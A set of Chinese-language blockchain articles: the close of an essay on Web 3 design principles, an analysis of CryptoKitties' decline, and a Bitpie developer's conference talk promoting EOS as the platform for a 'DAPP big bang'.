  • 可能的话,允许用户建立他们自己的标签、类别和自我描述等信息。这能让每个用户在不同的项目中有不同的身份。这一点已经在和身份相关的其他原则中暗示了,这些原则会在未来展示出来。

11 — 其他未来设计原则

正如你可能理解的那样,之前的这些原则很多都是关于身份、声誉和治理的想法。前面两个原则是在任何一个社区驱动的应用中都普遍适用的。但是他们对代币驱动的应用(Token Curated Registries)会非常重要,有可能对于很多 DAO 也很重要。

这些部分值得用单独的篇章来写,而这篇文章已经很长了。

因此在未来我会分析下面这些 Web 3 的设计原则:

  • 身份和名誉
  • 治理
  • 钱包
  • 交易所
  • 首次代币发行 & 代币售卖机制
  • 代币机制设计

接下来要走的路

 在 Web 3 设计原则中提出的“极度透明”的需求是非常清晰的,这个需求让很多在当下忙于解决其他方面问题的 Dapp 设计者压力很大

 — 像图书馆那样的索引

这因此也显然的是,Dapp 中应该有一个标准的工具集,开发者能够接入并在他们的 Dapp 中展示。并且可能的话链接他们的请求到 web 3 的程序库,免费的为他们的用户获得所有的这些透明的服务。

我在想象,在 Web 3 时代有一个类似图书馆索引的东西。(称为“链导“是不是有点太硬核了?)

—独立的浏览器插件

这可能是一个可取的想法:应该要有一个独立的工具,不论 Dapp 的开发者是否愿意,这个工具能够向用户提供 Web 3 设计原则中的优势;它会成为一个各类 Dapp 的“透明的执行者”,这可以通过 Dapp 与某些原则的合规程度来识别恶意或草率的 Dapp 。

在这样的情况下,建立一个能够将代码内嵌在 Dapp 中并能够提供链视图功能,可能的话甚至能够提供一个快速认证 Dapp 的透明度和可信度浏览器插件

— 定制化服务

此外在这些原则中有很多服务的可能,甚至出现当下不存在的商业服务。

我提出了很多意见,你怎么看?

如果你对上述内容感兴趣,或者有任何的想法和思考,或者您是一个资助产品组织,并认为它可以适合您当前的目标,请联系 b [at] likuidlabs.com,或者 twitter @lyricalpolymath

我们来一起设计和建设去中心化的未来!

笔记(附录)

[1]别的和区块链有关的设计文章

已经在这个主题上创建的、应用了我研究的这些设计方法的相关文章并不多。

  • 区块链设计原则 ( Blockchain Design Principles ) — Design at IBM

这是目前为止关于这个主题最棒的一篇。它是由IBM前设计领导人,现 Consensys 设计总监 Sarah Baker Mills 写的。她提炼了很多很棒的、在 Web 3 设计原则中体现的原则,虽然和我用了不同的名称指代。她聊过关于数据展示,一致性,反馈,错误预测和积极引导相关的内容/

  • 区块链和设计 ( Blockchain and Design ) — hacker Noon

这是一个和21.co 首席设计者 Matt Storus 的访谈,内容是关于设计者面对的挑战和该做什么的一些想法。不幸的是采访体的文章不能够提炼出很多很多教义,但是这篇文章绝对是有趣的读物。

  • 区块链的用户体验 ( The user experience of Blockchain  )

一个通用的帖子,用于教育设计者关于区块链和设计挑战。

  • How can Design help Blockchain — The Spark

一些宏观的想法,关于在这个领域的设计者该考虑的问题

  • Designing for the Blockchain: launching an ethereum Smart Contract app一个围绕为投资平台设计更好的体验的研究案例,以及一些改善ICO参与的想法

[2] 我知道这些假设是一种现象学上的谬误,但我仍然使用它们,因为它们是一个有用的简化模型并且说明一点:对于一个非技术用户,若他不能以一种简单的方式自己验证数据,那么这些信息明显是不透明的。 透明度随后变成闪闪发光的海市蜃楼,变成对信任的忠实的期待。

谁杀死了加密猫?曾经一只猫等于130套上海豪宅,现在无人问津

区块链界首个现象级dApp的衰败。

当你无限接近死亡,

才能深切体会生的意义。

——马丁·海德格尔《存在与时间》

作者 | 45区;来源 | 45区(ID:block-45)

2017年11月28日,一款被称作加密猫(CryptoKitties)的区块链游戏正式发布,迅速火遍币圈,俘获了众多粉丝的心。

当时,以太坊创始人V神曾用沙特王子4.5亿美金购买达芬奇画作来类比加密猫,认为这是“世界的映射”。加密猫官方也曾声称“未来就是喵喵”。

45区(ID:block-45)在去年12月12日发表了“‘双12’上演区块链极致魔幻: “一只猫等于130套上海豪宅”一文,当时这款游戏处于一片红火之中。然而,一年过去后,这只猫并没有成为“世界的映射”,反而已经奄奄一息。

1

加密猫是一款基于ERC721的区块链收藏类游戏。其本身是由Axiom Zen工作室团队开发,用来科普区块链知识,却意外成为现象级的区块链游戏。

在游戏初始阶段,开发者销售出100个创世猫,同时每隔15分钟还有一个0代猫诞生可以用于买卖。

据悉,加密猫上线仅几小时就占据了以太坊超过15%的网络,贡献了 30%的交易量,甚至造成了以太坊网络的拥堵,直接导致以太坊打币的矿工费比平时高了10倍还会打包失败。

这其实也是加密猫日后衰落的原因之一。

据第三方CryptoKitties统计显示,截至2018年1月1日,加密猫的数量达到:355619只,被卖掉的猫数量达156746只,交易次数达379978次,交易总价达54572.1367ETH。

按照当时ETH价值,总交易量约2.7亿人民币,玩家数量达40203名。热门的加密猫售价高达百万人民币。

玩家的争相入场,让加密猫成为区块链界首个现象级应用,撸猫成为当时币圈相当时髦的潮流。

2018年3月,加密猫更是获得1200万美元的融资,从而将这款区块链游戏推向高潮。

2

然而,伴随着数字货币市场熊市寒冬的不断加剧,这款现象级的区块链游戏也进入了寒冷的冬天。

据BTCManager消息,加密猫用户群目前已下降95%。此外,消息还指出,当前大多数DApp用户数量均遭受大幅下跌。其价值相较于历史最高水平已经下降了98.5%。

Greylock社群负责人ChrisMcCann表示,加密猫的每日活跃用户数不足1000。人们对这款游戏的兴趣,来得快,去的也快,每日活跃用户数从14194的历史高点降到不足1000。

加密猫官方显然在今年上半年就感觉到危机的逼近,力求转型突破现有的模式寻找新的方向。

今年6月,加密猫官方公布了KittyVerse项目,宣称将加密猫从产品转型平台。即用户的猫将可以运用于各类游戏开发,赛车、战斗、换装,甚至线下产品也能见到加密猫,原本单一的游戏转型IP运营。

用户的每一个猫都是一个单独的IP,能不能拿到版权费就看用户的猫是否受欢迎。

然而效果不明显,在6月份一场的拍卖中,稀有物品的总量约为70万件,却只售出4200件。截止到12月11日,加密猫的日活跃用户仅剩316。

3

仅仅一年的时间,加密猫的就从币圈广受追捧的区块链游戏跌落神坛,成为今天无人问津的普通区块链dapp。

那么究竟是谁杀死这只猫的?

1

事实上在加密猫获得成功后,一大群类似的加密宠物疯狂出笼:

2018年1月,网易内测一款区块链宠物游戏“招财猫”。

2018年2月,百度上线了“莱茨狗”的虚拟宠物游戏。

2018年3月,小米区块链宠物“加密兔”正式上线。

许多区块链公司争相模仿加密猫养起了“狗马猴鱼”,链圈瞬间变成了一个动物园。有段子曾经称,加密宠物之多,真实的动物种类快不够用了。

这种恶性竞争直接导致加密猫低端玩家的关注度转移,改变市场面上原来加密猫一家独大的局面,从而将原本单一的用户人群分流。

2

目前关于以太坊提速方案也在不断被提出,但是就现状来看以太坊仍然广受网络拥堵的困扰。

12月6日,Etherscan.io数据显示,当前以太坊未确认交易数为102113笔。网络严重拥堵一直以来以太坊网络一直严重拥堵,未确认交易大多时候都在10万笔左右。

而这对于严重依赖以太坊交易的加密猫来说无疑是其进一步发展的直接障碍。

3

加密猫把自己定义为区块链游戏,,但玩法简单,缺乏品类开创性和独特性。

它更多是想通过买入高价稀缺的虚拟小猫,通过不断地繁殖出售来获利。但对于后续购买的用户加密猫官方并没有一个清晰的界定,也就是用户画像不够清晰,这款游戏是是面对区块链行业还是包含整个游戏玩家。

加密猫这类游戏,相比于数字货币交易来说资产用途单一并没有太大吸引力和突出优势,作为投资产品似乎又缺乏安全性,用户交易热情都会受到影响。

另外一方面,加密猫这种类型的区块链游戏几乎都是由具有资产属性的萌宠加一些简单喂养和培育玩法组成,操作频次极低基本没有游戏性。

加密猫的出现的其实有其历史意义:它证明在以太坊上并不是只有代币发行这一个应用,有更大的想象空间和场景可以去发挥和创造 。

但是显然单一粗糙的Dapp的应用并不能走上良性发展的直通车,区块链游戏本身仍然是游戏,最重要的一点是好玩有趣,并且应该有区块链特有的价值。

未来的区块链游戏发展还需要更多品类和玩法的开创性,同时类似以太坊底层的技术也需要一个不断优化的过程。

在牛市涌入的大量的资金下,加密猫火遍币圈。等潮水退去,市场会趋于冷静后,加密猫衰落是必然的。区块链游戏想要被市场认可到接受并扩大,仍然要在玩法和底层技术上进行不断增进。

比特派开发者文浩:什么是“DAPP 大爆炸”

由BITKAN、SATOSHI FOUNDATION LTD.主办的全球区块链开发者大会 GBDC 2018在香港正式开幕,为期两天的大会, 金色财经将会对本次大会内容进行全程播报。

在大会现场,比特派开发者文浩从钱包入口的角度分享了什么叫“DAPP 大爆炸”的精彩内容。

L1RZS52ehBwrI4wwCiA6I4TLRzzPoQxwDdwoDnIJ.jpeg

文浩表示,  “DAPP大爆炸”这个词全球最早是我提出来这个词,在国庆节前EOS内存首富王瑞锡分享活动中提出的。前几天我给国内的币圈、链圈大佬们专门拉了一个群又讲了DAPP大爆炸,两次分享效果非常好,但是有一个问题,币圈、链圈很多人在讲DAPP大爆炸时都会问一个问题,这个EOS是不是可以买?别因为我讲DAPP大爆炸就买EOS。

两个月前我提到“DAPP大爆炸”这个词到今天又发生了非常多的变化,大爆炸现在刚刚开始,先简要说一下,去中心化的几大币种,比特币、以太坊、EOS的区别,从去中心化程度来说,比特币最高,以太坊差一点,EOS经常垢病为去中心化一定程度,一定程度去中心不一定不是去中心化。从这个角度上讲,EOS的确远比比特、以太要逊色,但是还是去中心化,比特币是最安全的,出过问题最少。以太坊出过两次,EOS安全性差一些。比特币被证实认为不可篡改,以太坊因为DAO改过一次,EOS是仲裁委员会治理,可改的。

DAPP是以太坊带来的,为什么没有火起,没有发生在以太坊上。以太坊出过两个现象级产品,一个是加密猫,一个是Fomo 3D,为什么几年的时间里只出现过两个现象级产品?一大堆项目为什么今天都没有成功?没有人用,甚至都没有做出来,回过头来只有两个是现象级产品,火了两三周最多一个月销声匿迹,主要两点限制:

第一,TPS每秒交易速度。

第二,矿工性模型Gas。

有多少团队现在深陷以太坊DAPP开发泥潭。很多在以太坊干了一年没有干出效果。这就是以太坊DAPP的状况。

DAPP大爆炸有三个要素,这三个要素会促成DAPP大爆炸的形成。对比互联网爆炸或者移动互联网爆炸,比如说对于移动互联网爆炸来说,如果没有iPhone大爆炸不会来,如果iPhone没有IOS这么好的操作系统大爆炸也不会出来,没有高分辨率屏、多点触摸等也不来。同样,如果没有4G网络也不会出来。移动互联网大爆炸也需要很多先决条件。

DAPP大爆炸也需要很多因素:

第一,高TPS,高每秒交易处理。

第二,低到近乎为0的交易成本。

第三,钱包的无缝集成,打开钱包软件就可以玩DAPP,这个大爆炸才有可能来。

高TPS,我们都知道比特币的TPS大概每秒3笔,以太高了几倍,EOS在测试环境下大概能做到几千,有吹牛的项目一张嘴几百万不要信。高TPS的意义是什么?当你玩一个DAPP或者玩一个卡牌游戏,出一张牌三分钟响应结果,没人会玩。高TPS的意义起码有一个及格的响应。

低交易成本,近乎为零的交易成本,这种情况下矿工费模型是区块链基础模型。对于比特币的基础货币来说没任何问题,因为基础货币我们习惯了,可以付出一些成本用来转账,保护账本稳定。但是对于DAPP来说这个成本有问题。比如说我问大家一个问题,如果去澳门玩老虎机,每把老虎机一美金,如果告诉你请给我10美分的矿工费不行,这是不成立的。这也是以太坊DAPP很难起来的原因。

钱包无缝集成,浏览器插件让手机钱包直接玩,比特派做了很多工作,DAPP可以无缝玩,体验和本地的软件客户端软件差不多,那些80分这个50分,算能玩了。如果做不到无缝集成用户没法玩。钱包的集成意义有点像iPhone对于移动互联网意义一样。

刚才的三大要素我大体上来讲我这边的评分给EOS打到60分,测试环境下有几千个TPS,然后交易成本近乎为零,但是有两个门槛:

第一,开户门槛。用EOS首先要开通账户,这类事像比特派,如果是用户的话可以送你帮大家减免这部分费用。

第二,资源门槛。现在火爆的是CPU,在座的各位如果是EOS的话,现在EOS的DAPP生态非常火,现在的CPU拥堵非常厉害。我基本上压了小一万个EOS的CPU才可以玩的比较畅快,这实际上是当前解决的不太好的门槛,有待于主链解决。钱包里玩起来体验很好,我觉得60分以上的水准。

EOS当前的确碰到了CPU拥堵这类的问题,未来有可能通过分层来解决问题,比如说主链层只解决篡改的去中心化程度,Layer2解决高存储、高拓展性,如果做分层,比特币很难做这类的改动。BCH是否未来可以通过这种改动做到更好的扩展模型,做到鱼和熊掌兼得呢?这是大家探讨的问题。是否能做到在Layer2层面上做到更低的交易成本呢?这都是可以探讨的话题。

在这里还要再提一个点,刚才提到了DAPP爆炸三要素,现在再问大家一个问题,很多人说EOS开发DAPP,EOS智能合约拿C++写,以太坊智能合约拿Solidity写,C++肯定比Solidity难,是不是开发合约比以太坊难很多?真实情况告诉大家,EOS开发智能合约、开发DAPP比以太坊开发简单几十倍、上百倍,有非常多的团队在以太这个生态中,比如说做预测市场的,做了一年想做去中心化的DAPP,一年后上线了一个中心化的版本。包括之前有个很火的项目做区块链智能合约接待的,最开始做去中心化版本做一年做不了。

你觉得C++智能合约很难,忽略了一点智能合约代码也就是几百行,找一个工程师就能写完。真正难的是架构,两个软件工程师,用一周的时间,今天搞了一个活动,DAPP网站拆大小游戏,两个人一周就可以做出来,非常好。这到底是怎么做到的?两个软件工程师一周做一个DAPP,怎么做到呢?

第一,开发DAPP时不需要用户系统,因为钱包集成。开发一个模块需要好几个工程师干三个月,EOS生态上不需要写。需要支付模块吗?不需要。很多开发交易所模块可能又要花几个人做钱包安全体系,花几个人干三个月不一定安全,EOS生态DAPP不用写。需不需要数据库呢?大部分逻辑不需要,都在链上,只需要合约好就行了。可能要做一些后端的事,因为要额外逻辑,最简单的EOS不需要。只要一个好的前端工程师就可以。再用一个后端工程师稍微弥补一下后端就可以了。

从这个角度上讲,EOS的DAPP能够有大爆炸式的发展,使得开发者非常容易。

以上我说的这些导致了EOS中DAPP大爆炸。从两个月前提出这个词开始到今天,一大堆乱七八糟的DAPP都是小团队,其中出现一些现象级产品,赚很多钱的产品也有。

EOS生态中有特别重要的一点,在座的各位都不是DAPP用户,EOS生态中不再需要中心化交易所,你去问一个DAPP玩家,得到的token在哪卖?会在去中心化交易所卖。EOS有好几个去中心化交易所。虽然当前量无法跟中心化交易所比,但是跟以太上的不一样。刚才提到CPU很拥堵,大家租CPU,会用去中心化的方式、智能合约、DAPP的方式做。也有第三方的方式做了chaintai,很难用,但是一堆人用。

比特派在EOS生态计划做哪些事?除了完善集成无缝DAPP以外,在如下方面大大降低了进入EOS世界的门槛或者DAPP世界的门槛。比如说提供法币相关功能,大大降低了普通用户的门槛。我们为EOS生态提供了EOS的稳定币,除了比特币、以太坊、USD的稳定币,大大降低普通用户、币圈、链圈用户以及法币世界的人进入门槛。

总之,DAPP时代已经来临了,在币圈、链圈寒冬的今天,各个币圈、链圈的人很冷冻的状态,活跃度非常低。DAPP生态中的群活跃度跟牛市一样,所以不要错过当前正在发生的DAPP趋势。